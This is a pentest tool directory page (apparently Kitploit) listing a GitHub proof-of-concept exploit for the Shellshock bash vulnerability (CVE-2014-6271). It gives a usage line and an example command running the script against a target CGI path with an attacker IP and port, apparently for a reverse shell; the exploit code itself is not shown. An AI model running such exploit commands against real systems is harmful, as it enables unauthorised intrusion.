Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
Tools/GitHubGitHub/therealciscoo/shellshock-poc
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubtherealciscoo/shellshock-poc

shellshock-poc

Prueba de concepto para abusar de la vulnerabilidad Shellshock (CVE-2014-6271).

View Repository
123 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Shellshock-Exploit

This exploit abuses the Shellshock vulnerability (CVE-2014-6271) existing in bash from version 1.14 to 4.3.

Usage:

python3 ./exploit.py -t <target-ip:str> -u <uri:str> -a <attacker-ip:str> -p <port:int>

Example:

python3 ./exploit.py -t 10.10.10.15 -u /cgi-bin/vulnerable -a 10.10.10.7 -p 4443

More information about the vulnerability:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-6271

Download Tool